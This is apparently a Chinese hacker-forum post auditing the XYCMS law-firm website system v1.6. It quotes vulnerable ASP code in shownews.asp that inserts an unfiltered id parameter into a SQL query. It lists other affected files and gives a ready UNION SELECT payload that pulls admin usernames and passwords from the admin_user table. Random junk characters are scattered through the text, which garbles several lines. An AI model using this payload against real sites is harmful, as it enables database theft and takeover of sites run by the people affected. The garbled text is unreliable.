前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
r8 m9 Q' M6 E' M) A- `( E* \1 Y ! g( p0 L/ m4 P
淫荡分割线" H! j( X# b; ^, v- I2 E
--------------------------------------------------------9 o" S8 k& W1 R4 l7 F+ o
8 } }" k: `+ G3 u3 C
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
1 J7 J( u( H3 F4 Q- W! P; g源码地址:http://down.chinaz.com/soft/29233.htm" c: X: r- s7 o
1 i! c. m6 r( s+ i3 w
漏洞文件:shownews.asp3 ^6 a/ F( Y2 m2 a' \, ]4 L* A
漏洞代码:7-13行9 u$ k8 q" A5 ~+ k3 M
% O% A* Y/ ^% }1 _+ u
- N/ ]- g6 r; S2 L2 R- m2 C+ P<% % [' N; a+ @2 A. }; x" G1 B5 J9 P, h
id=request.QueryString("id")+ G) p: ^& X+ A, s' q% |
) A* R" e o1 F; ?set snews=server.createobject("adodb.recordset") 2 Y# T+ K# |* `# I/ H A
exec="select * from [news] where id="&id/ S. w8 O' o4 M, W) h3 v
snews.open exec,conn,1,1
* ^9 h8 C" v* N Y" o( o2 t$ [%>0 D- E9 U! m& y) }2 B
T% f) U: w. |2 M$ [3 f
; R' R- ?7 |( B1 a V Y
什么过滤都没有 直造成注入! ~: o1 [6 b" f
0 c/ k1 p% `, M1 N5 j1 S注入点:http://127.0.0.1:99/shownews.asp?id=xx
+ |( d* T3 }. b# ]; }* Q
6 Q0 c1 q, A: r; G, Y* W其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找! ~; ?2 o! N+ m1 M P! ^+ c
& e% n. t: I% T. B% e
; {' `( J2 l- N' B$ aexp: union select 1,admin,password,4,5,7 from admin_user; N# ? Y: d) l0 {
+ g! @# D& @8 j+ a4 W+ L3 _ |